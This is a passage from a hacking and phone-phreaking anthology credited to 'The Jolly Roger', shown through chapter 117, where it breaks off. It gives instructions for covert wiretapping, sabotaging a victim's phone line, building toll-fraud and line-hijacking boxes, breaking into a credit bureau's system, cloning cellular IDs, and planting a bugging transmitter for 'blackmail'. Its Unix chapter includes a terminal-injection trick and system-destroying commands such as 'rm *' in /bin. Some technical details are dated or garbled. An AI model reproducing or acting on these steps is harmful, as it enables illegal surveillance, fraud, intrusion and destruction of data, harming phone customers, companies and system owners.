Chapters 101-150

101.RemObS by The Jolly Roger Some of you may have heard of devices called Remobs which stands for Remote Observation System. These Devices allow supposedly authorized telephone employees to dial into them from anywhere, and then using an ordinary touch tone fone, tap into a customer's line in a special receive only mode. [The mouthpiece circuit is deactivated, allowing totally silent observation from any fone in the world (Wire tapping without a court order is against the law)] How Remobs Work Dial the number of a Remob unit. Bell is rumored to put them in the 555 information exchanges, oron special access trunks [Unreachable except via blue box]. A tone will then be heard for approximately 2 seconds and then silence. You must key in (In DTMF) a 2 to 5 digit access code while holding each digit down at least 1 second. If the code is not entered within 5 or 6 seconds, the Remob will release and must be dialed again. If the code is supposedly another tone will be heard. A seven digit subscriber fone number can then be entered [The Remob can only handle certain 'exchanges' which are prewired, so usually one machine cannot monitor an entire NPA]. The Remob will then connect to the subscribers line. The listener will hear the low level idle tone as long as the monitored party is on hook. As the monitored party dials [rotary or DTMF], the listener would hear [And Record] the number being dialed. Then the ENTIRE conversation, datalink, whatever is taking place, all without detection. There is no current box which can detect Remob observation, since it is being done with the telephone equipment that makes the connection. When the listener is finished monitoring of that particular customer, he keys the last digit of the access code to disconnects him from the monitored line and return to the tone so that he can key in another 7 digit fone number. When the listener is totally finished with the Remob, he keys a single 'disconnect digit' which disconnects him from the Remob so that the device can reset and be ready for another caller. History of Remobs Bell has kept the existence of Remobs very low key. Only in 1974, Bell acknowledged that Remobs existed. The device was first made public during hearings on "Telephone Monitoring Practices by Federal Agencies" before a subcommittee on government operations. House of Representatives, Ninety-Third Congress, June 1974. It has since been stated by Bell that the Remob devices are used exclusively for monitoring Bell employees such as operators, information operators, etc., to keep tabs on their performance. [Suuureee, were stupid] Possible Uses for Remobs The possible uses of Remobs are almost as endless as the uses of self created fone line. Imagine the ability to monitor bank lines etc, just off the top of my head I can think of these applications: Data Monitoring of: · TRW · National Credit Bureau. · AT&T Cosmos. · Bank Institutions. · CompuServe and other Networks. Voice Monitoring of: · Bank Institutions. · Mail Order businesses. · Bell Telephone themselves. · Any place handling sensitive or important information. · Anyone that you may not like. With just one Remob, someone could get hundreds of credit cards, find out who was on vacation, get CompuServe passwords by the dozens, disconnect peoples fones, do credit checks, find out about anything that they may want to find out about. I'm sure you brilliant can see the value of a telephone hobbyist and a telecommunications enthusiast getting his hands on a few choice Remobs. Caution If any reader should discover a Remob during his (or her) scanning excursions, please keep in mind the very strict federal laws regarding wiretapping and unauthorized use of private Bell property. 102.Scarlet Box Plans by The Jolly Roger The purpose of a Scarlet box is to create a very bad connection, it can be used to crash a BBS or just make life miserable for those you seek to avenge. Materials: · 2 alligator clips · 3 inch wire, or a resister (plain wire will create greatest amount of static) (Resister will decrease the amount of static in proportion to the resister you are using) 1.Find the phone box at your victims house, and pop the cover off. 2.Find the two prongs that the phone line you wish to box are connected to. 3.Hook your alligator clips to your (wire/resister). 4.Find the lower middle prong and take off all wires connected to it, I think this disables the ground and call waiting and shit like that. 5.Now take one of the alligator clips and attach it to the upper most prong, and take the other and attach it to the lower middle prong. 6.Now put the cover back on the box and take off!! ** ######## ** ** # #### # ** ######## / # #### # / ######## / / / / / / / / **/ ** ** ** ** ** (**)= prongs ** (/) = (wire/resister) (##)= some phone bullshit 103.Silver Box Plans by The Jolly Roger Introduction: First a bit of Phone Trivia. A standard telephone keypad has 12 buttons. These buttons, when pushed, produce a combination of two tones. These tones represent the row and column of the button you are pushing. 1 1 1 2 3 4 0 3 7 9 6 7 697 (1) (2) (3) 770 (4) (5) (6) 851 (7) (8) (9) 941 (*) (0) (#) So (1) produces a tone of 697+1209, (2) produces a tone of 697+1336, etc. Function: What the Silver Box does is just creates another column of buttons, with the new tone of 1633. These buttons are called A, B, C, and D. Usefulness: Anyone who knows anything about phreaking should know that in the old days of phreaking, phreaks used hardware to have fun instead of other people's Sprint and MCI codes. The most famous (and useful) was the good ol' Blue Box. However, Ma Bell decided to fight back and now most phone systems have protections against tone-emitting boxes. This makes boxing just about futile in most areas of the United States (i.e. those areas with Crossbar or Step-By-Step). If you live in or near a good-sized city, then your phone system is probably up-to-date (ESS) and this box (and most others) will be useless. However, if you live in the middle of nowhere (no offense intended), you may find a use for this and other boxes. Materials: · 1 Foot of Blue Wire · 1 Foot of Gray Wire · 1 Foot of Brown Wire · 1 Small SPDT Switch (*) · 1 Standard Ma Bell Phone (*)SPDT = Single Pole/Double Throw Tools: · 1 Soldering Iron · 1 Flat-Tip Screwdriver Procedure: 1.Loosen the two screws on the bottom of the phone and take the casing off. 2.Loosen the screws on the side of the keypad and remove the keypad from the mounting bracket. 3.Remove the plastic cover from the keypad. 4.Turn the keypad so that *0# is facing you. Turn the keypad over. You'll see a bunch of wires, contacts, two Black Coils, etc. 5.Look at the Coil on the left. It will have five (5) Solder Contacts facing you. Solder the Gray Wire to the fourth Contact Pole from the left. 6.Solder the other end of the Gray Wire to the Left Pole of the SPDT Switch. 7.Find the Three (3) Gold-Plated Contacts on the bottom edge of the keypad. On the Left Contact, gently separate the two touching Connectors (they're soldered together) and spread them apart. 8.Solder the Brown Wire to the Contact farthest from you, and solder the other end to the Right Pole of the SPDT Switch. 9.Solder the Blue Wire to the Closest Contact, and the other end to the Center Pole of the SPDT Switch. 10.Put the phone back together. Using The Silver Box: What you have just done was installed a switch that will change the 369# column into an ABCD column. For example, to dial a 'B', switch to Silver Box Tones and hit '6'. No one is sure of the A, B, and C uses. However, in an area with an old phone system, the 'D' button has an interesting effect. Dial Directory Assistance and hold down 'D'. The phone will ring, and you should get a pulsing tone. If you get a pissed-off operator, you have a newer phone system with defenses against Silver Boxes. At the pulsing tone, dial a 6 or 7. These are loop ends. 104.Bell Trashing by The Jolly Roger The Phone Co. will go to extremes on occasions. In fact, unless you really know what to expect from them, they will surprise the heck out of you with their "unpublished tariffs". Recently, a situation was brought to my attention that up till then I had been totally unaware of, least to mention, had any concern about. It involved garbage! The phone co. will go as far as to prosecute anyone who rummages through their garbage and helps himself to some Of course, they have their reasons for this, and no doubt benefit from such action. But, why should they be so picky about garbage? The answer soon became clear to me: those huge metal bins are filled up with more than waste old food and refuse... Although it is Pacific Tele. policy to recycle paper waste products, sometimes employees do overlook this sacred operation when sorting the garbage. Thus top-secret confidential Phone Co. records go to the garbage bins instead of the paper shredders. Since it is constantly being updated with "company memorandums, and supplied with extensive reference material, the Phone co. must continually dispose of the outdated materials. Some phone companies are supplied each year with the complete "System Practices" guide. This publication is an over 40 foot long library of reference material about everything to do with telephones. As the new edition arrives each year, the old version of "System Practices" must also be thrown out. I very quickly figured out where some local phone phreaks were getting their material. They crawl into the garbage bins and remove selected items that are of particular interest to them and their fellow phreaks. One phone phreak in the Los Angeles area has salvaged the complete 1972 edition of "Bell System Practices". It is so large and was out of order (the binders had been removed) that it took him over a year to sort it out and create enough shelving for it in his garage. Much of this "Top Secret" information is so secret that most phone companies have no idea what is in their files. They have their hands full simply replacing everything each time a change in wording requires a new revision. It seems they waste more paper than they can read! It took quite a while for Hollywood Cal traffic manager to figure out how all of the local phone phreaks constantly discovered the switchroom test numbers. Whenever someone wanted to use the testboard, they found the local phone phreaks on the lines talking to all points all over the world. It got to the point where the local garbage buffs knew more about the office operations than the employees themselves. One phreak went so far as to call in and tell a switchman what his next daily assignment would be. This, however, proved to be too much. The switchman traced the call and one phone phreak was denied the tool of his trade. In another rather humorous incident, a fellow phreak was rummaging through the trash bin when he heard someone approaching. He pressed up against the side of the bin and silently waited for the goodies to come. You can imagine his surprise when the garbage from the lunchroom landed on his head. Most people find evenings best for checking out their local Telco trash piles. The only thing necessary is a flashlight and, in the case mentioned above, possibly a rain coat. A word of warning though, before you rush out and dive into the trash heap. It is probably illegal, but no matter where you live, you certainly won't get the local policeman to hold your flashlight for you. 105.Canadian WATS Phonebook by The Jolly Roger 800-227-4004 ROLM Collagen Corp. 800-227-8933 ROLM Collagen Corp. 800-268-4500 Voice Mail 800-268-4501 ROLM Texaco 800-268-4505 Voice Mail 800-268-6364 National Data Credit 800-268-7800 Voice Mail 800-268-7808 Voice Mail 800-328-9632 Voice Mail 800-387-2097 Voice Mail 800-387-2098 Voice Mail 800-387-8803 ROLM Canadian Tire 800-387-8861 ROLM Canadian Tire 800-387-8862 ROLM Canadian Tire 800-387-8863 ROLM Canadian Tire 800-387-8864 ROLM Canadian Tire 800-387-8870 ROLM Halifax Life 800-387-8871 ROLM Halifax Life 800-387-9115 ASPEN Sunsweep 800-387-9116 ASPEN Sunsweep 800-387-9175 PBX [Hold Music = CHUM FM] 800-387-9218 Voice Messenger 800-387-9644 Carrier 800-426-2638 Carrier 800-524-2133 Aspen 800-663-5000 PBX/Voice Mail [Hold Music = CFMI FM] 800-663-5996 Voice Mail (5 rings) 800-847-6181 Voice Mail NOTES: Each and every one of these numbers is available to the 604 (British Columbia) Area Code. Most are available Canada Wide and some are located in the United States. Numbers designated ROLM have been identified as being connected to a ROLM Phonemail system. Numbers designated ASPEN are connected to an ASPEN voice message system. Numbers designated VOICE MAIL have not been identified as to equipment in use on that line. Numbers designated carrier are answered by a modem or data set. Most Voice Message systems, and ALL Rolms, sound like an answering machine. Press 0 during the recording when in a rolm, * or # or other DTMF in other systems, and be propelled into another world... 106.Hacking TRW by The Jolly Roger When you call TRW, the dial up will identify itself with the message "TRW". It will then wait for you to type the appropriate answer back (such as CTRL-G) Once This has been done, the system will say "CIRCUIT BUILDING IN PROGRESS" Along with a few numbers. After this, it clears the screen (CTRL L) followed by a CTRL-Q. After the system sends the CTRL-Q, It is ready for the request. You first type the 4 character identifier for the geographical area of the account.. (For Example) TCA1 - for certain Calif. & Vicinity subscribers. TCA2 - A second CALF. TRW System. TNJ1 - Their NJ Database. TGA1 - Their Georgia Database. The user then types A and then on the next line, he must type his 3 char. Option. Most Requests use the RTS option. OPX, RTX, and a few others exist. (NOTE) TRW will accept an A, C, or S as the 'X' in the options above.) Then finally, the user types his 7 digit subscriber code. He appends his 3-4 character password after it. It seems that if you manage to get hold of a TRW Printout (Trashing at Sears, Saks, ETC. or from getting your credit printout from them) Their subscriber code will be on it leaving only a 3-4 character p/w up to you. For Example, (Call the DialUp) TRW System Types, (ST) CTRL-G (You type, YT) Circuit building in progress 1234 (ST) CTRL-L CRTL-Q (TCA1 CYT) BTS 3000000AAA (YT] Note: This system is in Half Duplex, Even Parity, 7 Bits per word and 2 Stop Bits. CAUTION: It is a very stressed rumor that after typing in the TRW password Three (3) times.. It sets an Automatic Number Identification on your ass, so be careful. And forget who told you how to do this.. 107.Hacking Vax's & Unix by The Jolly Roger Unix is a trademark of AT&T (and you know what that means) In this article, we discuss the unix system that runs on the various vax systems. If you are on another unix-type system, some commands may differ, but since it is licensed to bell, they can't make many changes. Hacking onto a unix system is very difficult, and in this case, we advise having an inside source, if possible. The reason it is difficult to hack a vax is this: Many vax, after you get a carrier from them, respond=> Login: They give you no chance to see what the login name format is. Most commonly used are single words, under 8 digits, usually the person's name. There is a way around this: Most vax have an acct. called 'suggest' for people to use to make a suggestion to the system root terminal. This is usually watched by the system operator, but at late he is probably at home sleeping or screwing someone's brains out. So we can write a program to send at the vax this type of a message: A screen freeze (Cntl-S), screen clear (system dependant), about 255 garbage characters, and then a command to create a login acct., after which you clear the screen again, then unfreeze the terminal. What this does: When the terminal is frozen, it keeps a buffer of what is sent. Well, the buffer is about 127 characters long. so you overflow it with trash, and then you send a command line to create an acct. (System dependant). After this you clear the buffer and screen again, then unfreeze the terminal. This is a bad way to do it, and it is much nicer if you just send a command to the terminal to shut the system down, or whatever you are after... There is always, *Always* an acct. called root, the most powerful acct. to be on, since it has all of the system files on it. If you hack your way onto this one, then everything is easy from here on... On the unix system, the abort key is the Cntl-D key. Watch how many times you hit this, since it is also a way to log off the system! A little about unix architecture: The root directory, called root, is where the system resides. After this come a few 'sub' root directories, usually to group things (stats here, priv stuff here, the user log here...). Under this comes the superuser (the operator of the system), and then finally the normal users. In the unix 'Shell' everything is treated the same. By this we mean: You can access a program the same way you access a user directory, and so on. The way the unix system was written, everything, users included, are just programs belonging to the root directory. Those of you who hacked onto the root, smile, since you can screw everything...the main level (exec level) prompt on the unix system is the $, and if you are on the root, you have a # (superuser prompt). Ok, a few basics for the system... To see where you are, and what paths are active in regards to your user account, then type => pwd This shows your acct. separated by a slash with another pathname (acct.), possibly many times. To connect through to another path, or many paths, you would type: You=> path1/path2/path3 And then you are connected all the way from path1 to path3. You can run the programs on all the paths you are connected to. If it does not allow you to connect to a path, then you have insufficient privs, or the path is closed and archived onto tape. You can run programs this way also: you=> path1/path2/path3/program-name Unix treats everything as a program, and thus there a few commands to learn... To see what you have access to in the end path, type: ls for list. This show the programs you can run. You can connect to the root directory and run it's programs with=> /root By the way, most unix systems have their log file on the root, so you can set up a watch on the file, waiting for people to log in and snatch their password as it passes thru the file. To connect to a directory, use the command: => cd pathname This allows you to do what you want with that directory. You may be asked for a password, but this is a good way of finding other user names to hack onto. The wildcard character in unix, if you want to search down a path for a game or such, is the *. => ls /* Should show you what you can access. The file types are the same as they are on a dec, so refer to that section when examining file. To see what is in a file, use the => pr filename command, for print file. We advise playing with pathnames to get the hang of the concept. There is on-line help available on most systems with a 'help' or a '?'. We advise you look thru the help files and pay attention to anything they give you on pathnames, or the commands for the system. You can, as a user, create or destroy directories on the tree beneath you. This means that root can kill everything but root, and you can kill any that are below you. These are the => mkdir pathname => rmdir pathname commands. Once again, you are not alone on the system... type=> who to see what other users are logged in to the system at the time. If you want to talk to them=> write username Will allow you to chat at the same time, without having to worry about the parser. To send mail to a user, say => mail And enter the mail sub-system. To send a message to all the users on the system, say => wall Which stands for 'write all'. By the way, on a few systems, all you have to do is hit the key to end the message, but on others you must hit the cntl-D key. To send a single message to a user, say => write username this is very handy again! If you send the sequence of characters discussed at the very beginning of this article, you can have the super-user terminal do tricks for you again. Privs: If you want superuser privs, you can either log in as root, or edit your acct. so it can say => su this now gives you the # prompt, and allows you to completely by-pass the protection. The wonderful security conscious developers at bell made it very difficult to do much without privs, but once you have them, there is absolutely nothing stopping you from doing anything you want to. To bring down a unix system: => chdir /bin => rm * this wipes out the pathname bin, where all the system maintenance files are. Or try: => r -r This recursively removes everything from the system except the remove command itself. Or try: => kill -1,1 => sync This wipes out the system devices from operation. When you are finally sick and tired from hacking on the vax systems, just hit your cntl-d and repeat key, and you will eventually be logged out. The reason this file seems to be very sketchy is the fact that bell has 7 licensed versions of unix out in the public domain, and these commands are those common to all of them. I recommend you hack onto the root or bin directory, since they have the highest levels of privs, and there is really not much you can do (except develop software) without them. 108.Verification Circuits by The Jolly Roger 1.One busy verification conference circuit is always provided. The circuit is a three-way conference bridge that enables an operator to verify the busy/idle condition of a subscriber line. Upon request of a party attempting to reach a specified directory number, the operator dials the called line number to determine if the line is in use, if the receiver is off the hook, or if the line is in lockout due to a fault condition. The operator then returns to the party trying to reach the directory number and states the condition of the line. Lines with data security can not be accessed for busy verification when the line is in use.(Refer also to data security.) 2.Three ports are assigned to each busy verification conference circuit. One port is for operator access and two ports are used to split an existing connection. To verify the busy/idle condition of a line, the operator established a connection to the operator access port and dials the directory number of the line to be verified. If the line is in use, the existing connection is broken and immediately re-established through the other two ports of the busy verification circuit without interruption. Busy verification circuit is controlled by access code. A dedicated trunk can be used but is not necessary. 3.The busy verification circuit also can be used for test verify from the wire chiefs test panel B. Additional busy verification conference circuits (002749) there it is right out of an ESS manual word for word! And I'm getting 25 linear feet of ESS manuals!!! Not counting the stack received so far! 109.White Box Plans by The Jolly Roger Introduction: The White Box is simply a portable touch-tone keypad. For more information on touch-tone, see my Silver Box Plans. Materials: · 1 Touch-Tone Keypad · 1 Miniature 1000 to 8 Ohm Transformer (Radio Shack # 273-1380) · 1 Standard 8 Ohm Speaker · 2 9V Batteries · 2 9V Battery Clips Procedure: 1.Connect the Red Wire from the Transformer to either terminal on the speaker. 2.Connect the White Wire from the transformer to the other terminal on the speaker. 3.Connect the Red Wire from one Battery Clip to the Black Wire from the other Battery Clip. 4.Connect the Red Wire from the second Battery Clip to the Green Wire from the Keypad. 5.Connect the Blue Wire from the Keypad to the Orange/Black Wire from the Keypad. 6.Connect the Black Wire from the first Battery Clip to the two above wires (Blue and Black/Orange). 7.Connect the Black Wire from the Keypad to the Blue Wire from the Transformer. 8.Connect the Red/Green Wire from the Keypad to the Green Wire from the Transformer. 9.Make sure the Black Wire from the Transformer and the remaining wires from the Keypad are free. 10.Hook up the Batteries. Optional: 1.Put it all in a case. 2.Add a Silver Box to it. Use: Just use it like a normal keypad, except put the speaker next to the receiver of the phone you're using. 110.The BLAST Box by The Jolly Roger Ever want to really make yourself be heard? Ever talk to someone on the phone who just doesn't shut up? Or just call the operator and pop her eardrum? Well, up until recently it has been impossible for you to do these things. That is, unless of course you've got a blast box. All a blast box is, is a really cheap amplifier, (around 5 watts or so) connected in place of the microphone on your telephone. It works best on model 500 AT&T Phones, and if constructed small enough, can be placed inside the phone. Construction: Construction is not really important. Well it is, but since I'm letting you make your own amp, I really don't have to include this. Usage: Once you've built your blast box, simply connect a microphone (or use the microphone from the phone) to the input of the amplifier, and presto. There it is. Now, believe it or not, this device actually works. (At least on crossbar.) It seems that Illinois bell switching systems allow quite a lot of current to pass right through the switching office, and out to whoever you're calling. When you talk in the phone, it comes out of the other phone (again it works best if the phone that you're calling has the standard western electric earpiece) incredibly loud. This device is especially good for PBS Subscription drives. Have "Phun", and don't get caught! 111.Dealing with the Rate & Route Operator by The Jolly Roger It seems that fewer and fewer people have blue boxes these days, and that is really too bad. Blue boxes, while not all that great for making free calls (since the TPC can tell when the call was made, as well as where it was too and from), are really a lot of fun to play with. Short of becoming a real live TSPS operator, they are about the only way you can really play with the network. For the few of you with blue boxes, here are some phrases which may make life easier when dealing with the rate & route (R&R) operators. To get the R&R op, you send a KP + 141 + ST. In some areas you may need to put another NPA before the 141 (i.e., KP + 213 + 141 + ST), if you have no local R&R ops. The R&R operator has a myriad of information, and all it takes to get this data is mumbling cryptic phrases. There are basically four special phrases to give the R&R ops. They are NUMBERS route, DIRECTORY route, OPERATOR route, and PLACE NAME. To get an R&R an area code for a city, one can call the R&R operator and ask for the numbers route. For example, to find the area code for Carson City, Nevada, we'd ask the R&R op for "Carson City, Nevada, numbers route, please." and get the answer, "Right... 702 plus." meaning that 702 plus 7 digits gets us there. Sometimes directory assistance isn't just NPA+131. The way to get these routings is to call R&R and ask for "Anaheim, California, directory route, please." Of course, she'd tell us it was 714 plus, which means 714 + 131 gets us the D.A. op there. This is sort of pointless example, but I couldn't come up with a better one on short notice. Let's say you wanted to find out how to get to the inward operator for Sacremento, California. The first six digits of a number in that city will be required (the NPA and an NXX). For example, let us use 916 756. We would call R&R, and when the operator answered, say, "916 756, operator route, please." The operator would say, "916 plus 001 plus." This means that 916 + 001 + 121 will get you the inward operator for Sacramento. Do you know the city which corresponds to 503 640? The R&R operator does, and will tell you that it is Hillsboro, Oregon, if you sweetly ask for "Place name, 503 640, please." For example, let's say you need the directory route for Sveg, Sweden. Simply call R&R, and ask for, "International, Baden, Switzerland. TSPS directory route, please." In response to this, you'd get, "Right... Directory to Sveg, Sweden. Country code 46 plus 1170." So you'd route yourself to an international sender, and send 46 + 1170 to get the D.A. operator in Sweden. Inward operator routings to various countries are obtained the same way "International, London, England, TSPS inward route, please." and get "Country code 44 plus 121." Therefore, 44 plus 121 gets you inward for London. Inwards can get you language assistance if you don't speak the language. Tell the foreign inward, "United States calling. Language assistance in completing a call to (called party) at (called number)." R&R operators are people are people too, y'know. So always be polite, make sure use of 'em, and dial with care. 112.Cellular Phreaking by The Jolly Roger The cellular/mobile phone system is one that is perfectly set up to be exploited by phreaks with the proper knowledge and equipment. Thanks to deregulation, the regional BOC's (Bell Operating Companies) are scattered and do not communicate much with each other. Phreaks can take advantage of this by pretending to be mobile phone customers whose "home base" is a city served by a different BOC, known as a "roamer". Since it is impractical for each BOC to keep track of the customers of all the other BOC's, they will usually allow the customer to make the calls he wishes, often with a surcharge of some sort. The bill is then forwarded to the roamer's home BOC for collection. However, it is fairly simple (with the correct tools) to create a bogus ID number for your mobile phone, and pretend to be a roamer from some other city and state, that's "just visiting". When your BOC tries to collect for the calls from your alleged "home BOC", they will discover you are not a real customer; but by then, you can create an entirely new electronic identity, and use that instead. How does the cellular system know who is calling, and where they are? When a mobile phone enters a cell's area of transmission, it transmits its phone number and its 8 digit ID number to that cell, who will keep track of it until it gets far enough away that the sound quality is sufficiently diminished, and then the phone is "handed off" to the cell that the customer has walked or driven into. This process continues as long as the phone has power and is turned on. If the phone is turned off (or the car is), someone attempting to call the mobile phone will receive a recording along the lines of "The mobile phone customer you have dialed has left the vehicle or driven out of the service area." When a call is made to a mobile phone, the switching equipment will check to see if the mobile phone being called is "logged in", so to speak, or present in one of the cells. If it is, the call will then act (to the speaking parties) just like a normal call - the caller may hear a busy tone, the phone may just ring, or the call may be answered. How does the switching equipment know whether or not a particular phone is authorized to use the network? Many times, it doesn't. When a dealer installs a mobile phone, he gives the phone's ID number (an 8 digit hexadecimal number) to the local BOC, as well as the phone number the BOC assigned to the customer. Thereafter, whenever a phone is present in one of the cells, the two numbers are checked - they should be registered to the same person. If they don't match, the telco knows that an attempted fraud is taking place (or at best, some transmission error) and will not allow calls to be placed or received at that phone. However, it is impractical (especially given the present state of deregulation) for the telco to have records of every cellular customer of every BOC. Therefore, if you're going to create a fake ID/phone number combination, it will need to be "based" in an area that has a cellular system (obviously), has a different BOC than your local area does, and has some sort of a "roamer" agreement with your local BOC. How can one "phreak" a cellular phone? There are three general areas when phreaking cellular phones; using one you found in an unlocked car (or an unattended walk-about model), modifying your own chip set to look like a different phone, or recording the phone number/ID number combinations sent by other local cellular phones, and using those as your own. Most cellular phones include a crude "password" system to keep unauthorized users from using the phone - however, dealers often set the password (usually a 3 to 5 digit code) to the last four digits of the customer's mobile phone number. If you can find that somewhere on the phone, you're in luck. If not, it shouldn't be TOO hard to hack, since most people aren't smart enough to use something besides "1111", "1234", or whatever. If you want to modify the chip set in a cellular phone you bought (or stole), there are two chips (of course, this depends on the model and manufacturer, yours may be different) that will need to be changed - one installed at the manufacturer (often epoxied in) with the phone's ID number, and one installed by the dealer with the phone number, and possible the security code. To do this, you'll obviously need an EPROM burner as well as the same sort of chips used in the phone (or a friendly and unscrupulous dealer!). As to recording the numbers of other mobile phone customers and using them; as far as I know, this is just theory... but it seems quite possible, if you've got the equipment to record and decode it. The cellular system would probably freak out if two phones (with valid ID/phone number combinations) were both present in the network at once, but it remains to be seen what will happen. 113.Cheesebox Plans by The Jolly Roger A Cheesebox (named for the type of box the first one was found in) is a type of box which will, in effect, make your telephone a Pay-Phone.....This is a simple, modernized, and easy way of doing it.... Inside Info: These were first used by bookies many years ago as a way of making calls to people without being called by the cops or having their numbers traced and/or tapped...... How To Make A Modern Cheese Box Ingredients: · 1 Call Forwarding service on the line · 1 Set of Red Box Tones · The number to your prefix's Intercept operator (do some scanning for this one) How To: After you find the number to the intercept operator in your prefix, use your call-forwarding and forward all calls to her...this will make your phone stay off the hook(actually, now it waits for a quarter to be dropped in)...you now have a cheese box... In Order To Call Out On This Line: You must use your Red Box tones and generate the quarter dropping in...then, you can make phone calls to people...as far as I know, this is fairly safe, and they do not check much...Although I am not sure, I think you can even make credit-card calls from a cheesebox phone and not get traced... 114.How to start your own conferences! by The Jolly Roger Black Bart showed how to start a conference call thru an 800 exchange, and I will now explain how to start a conference call in a more orthodox fashion, the 2600Hz. Tone. Firstly, the fone company has what is called switching systems. There are several types, but the one we will concern ourselves with, is ESS (electronic switching system). If your area is zoned for ESS, do not start a conference call via the 2600Hz. Tone, or bell security will nail your ass! To find out if you are under ESS, call your local business office, and ask them if you can get call waiting/forwarding, and if you can, that means that you are in ESS country, and conference calling is very, very dangerous!!! Now, if you are not in ESS, you will need the following equipment: · An Apple CAT II modem · A copy of TSPS 2 or CAT'S Meow · A touch tone fone line · A touch tone fone. (True tone) Now, with TSPS 2, do the following: 1.Run tsps 2 2.Chose option 1 3.Chose option 6 4.Chose sub-option 9 5.Now type: 1-514-555-1212 (dashes are not needed) 6.Listen with your handset, and as soon as you hear a loud click, then type: $ 7.To generate the 2600 hz. Tone. This obnoxious tone will continue for a few 8.Seconds, then listen again and you should hear another loud 'click'. 9.Now type: km2130801050s · 'K' = kp tone · 'M' = multi frequency mode · 'S' = s tone 10.Now listen to the handset again, and wait until you hear the 'click' again. Then type: km2139752975s · 2139751975 is the number to bill the conference call to. Note: 213-975-1975 is a disconnected number, and I strongly advise that you only bill the call to this number, or the fone company will find out, and then.. remember, conference calls are itemized, so if you do bill it to an enemy's number, he can easily find out who did it and he can bust you! You should now hear 3 beeps, and a short pre-recorded message. From here on, everything is all menu driven. Conference call commands From the '#' mode: · 1 = call a number · 6 = transfer control · 7 = hangs up the conference call · 9 = will call a conference operator Stay away from 7 and 9! If for some reason an operator gets on-line, hang up! If you get a busy signal after km2130801050s, that means that the teleconference line is temporarily down. Try later, preferably from 9am to 5pm week days, since conference calls are primarily designed for business people. 115.Gold Box Plans by The Jolly Roger HOW TO BUILD IT You will need the following: · Two 10K OHM and three 1.4K OHM resistors · Two 2N3904 transistors · Two Photo Cells · Two Red LED'S (The more light produced the better) · A box that will not let light in · Red and Green Wire Light from the #1 LED must shine directly on the photocell #1. The gold box I made needed the top of the LED's to touch the photo cell for it to work. The same applies to the #2 photo cell and LED. 1 :-PHOTOCELL--: : : : :BASE : 1 TTTTT : +LED- TRANSISTOR : TTTTT : : : : -I(-- : :COLLECTOR RED1--< >:--: :-------:-----GREEN2 -I(-- : ----------: : : 2 :-/+/+/-/+/+/-/+/+/-/+/+/ LED 10K 10K 1.4K 1.4K RESISTORES 2 -PHOTOCELL----------------- : : :BASE : TTTTT : TRANSISTOR : TTTTT : : :EMITTER : GREEN1- --------------------------RED2 : : /+/+/ 1.4K The 1.4K resistor is variable and if the second part of the gold box is skipped it will still work but when someone picks up the phone they will hear a faint dial tone in the background and might report it to the Gestapo er...(AT&T). 1.4K will give you good reception with little risk of a Gestapo agent at your door. Now that you have built it take two green wires of the same length and strip the ends, twist two ends together and connect them to green1 and place a piece of tape on it with "line #1" writing on it. Continue the process with red1 only use red wire. Repeat with red2 and green2 but change to line #2. HOW TO INSTALL You will need to find two phone lines that are close together. Label one of the phone lines "Line #1". Cut the phone lines and take the outer coating off it. There should be 4 wires. Cut the yellow and black wires off and strip the red and green wires for both lines. Line #1 should be in two pieces. Take the green wire of one end and connect it to one of the green wires on the gold box. Take the other half of line #1 and hook the free green wire to the green wire on the phone line. Repeat the process with red1 and the other line. All you need to do now is to write down the phone numbers of the place you hooked it up at and go home and call it. You should get a dial tone!!! If not, try changing the emitter with the collector. 116.The History of ESS by The Jolly Roger Of all the new 1960s wonders of telephone technology - satellites, ultra modern Traffic Service Positions (TSPS) for operators, the picturephone, and so on - the one that gave Bell Labs the most trouble, and unexpectedly became the greatest development effort in Bell System's history, was the perfection of an electronic switching system, or ESS. It may be recalled that such a system was the specific end in view when the project that had culminated in the invention of the transistor had been launched back in the 1930s. After successful accomplishment of that planned miracle in 1947-48, further delays were brought about by financial stringency and the need for further development of the transistor itself. In the early 1950s, a Labs team began serious work on electronic switching. As early as 1955, Western Electric became involved when five engineers from the Hawthorne works were assigned to collaborate with the Labs on the project. The president of AT&T in 1956, wrote confidently, "At Bell Labs, development of the new electronic switching system is going full speed ahead. We are sure this will lead to many improvements in service and also to greater efficiency. The first service trial will start in Morris, Ill., in 1959." Shortly thereafter, Kappel said that the cost of the whole project would probably be $45 million. But it gradually became apparent that the development of a commercially usable electronic switching system - in effect, a computerized telephone exchange - presented vastly greater technical problems than had been anticipated, and that, accordingly, Bell Labs had vastly underestimated both the time and the investment needed to do the job. The year 1959 passed without the promised first trial at Morris, Illinois; it was finally made in November 1960, and quickly showed how much more work remained to be done. As time dragged on and costs mounted, there was a concern at AT&T and something approaching panic at Bell Labs. But the project had to go forward; by this time the investment was too great to be sacrificed, and in any case, forward projections of increased demand for telephone service indicated that within a few years a time would come when, without the quantum leap in speed and flexibility that electronic switching would provide, the national network would be unable to meet the demand. In November 1963, an all-electronic switching system went into use at the Brown Engineering Company at Cocoa Beach, Florida. But this was a small installation, essentially another test installation, serving only a single company. Kappel's tone on the subject in the 1964 annual report was, for him, an almost apologetic: "Electronic switching equipment must be manufactured in volume to unprecedented standards of reliability.... To turn out the equipment economically and with good speed, mass production methods must be developed; but, at the same time, there can be no loss of precision..." Another year and millions of dollars later, on May 30, 1965, the first commercial electric central office was put into service at Succasunna, New Jersey. Even at Succasunna, only 200 of the town's 4,300 subscribers initially had the benefit of electronic switching's added speed and additional services, such as provision for three party conversations and automatic transfer of incoming calls. But after that, ESS was on its way. In January 1966, the second commercial installation, this one serving 2,900 telephones, went into service in Chase, Maryland. By the end of 1967 there were additional ESS offices in California, Connecticut, Minnesota, Georgia, NY, Florida, and Pennsylvania; by the end of 1970 there were 120 offices serving 1.8 million customers; and by 1974 there were 475 offices serving 5.6 million customers. The difference between conventional switching and electronic switching is the difference between "hardware" and "software"; in the former case, maintenance is done on the spot, with screwdriver and pliers, while in the case of electronic switching, it can be done remotely, by computer, from a central point, making it possible to have only one or two technicians on duty at a time at each switching center. The development program, when the final figures were added up, was found to have required a staggering four thousand man-years of work at Bell Labs and to have cost not $45 million but $500 million! 117.The Lunch Box by The Jolly Roger Introduction The Lunch Box is a VERY simple transmitter which can be handy for all sorts of things. It is quite small and can easily be put in a number of places. I have successfully used it for tapping fones, getting inside info, blackmail and other such things. The possibilities are endless. I will also include the plans or an equally small receiver for your newly made toy. Use it for just about anything. You can also make the transmitter and receiver together in one box and use it as a walkie talkie. Materials you will need · (1) 9 volt battery with battery clip · (1) 25-mfd, 15 volt electrolytic capacitor · (2) .0047 mfd capacitors · (1) .022 mfd capacitor · (1) 51 pf capacitor · (1) 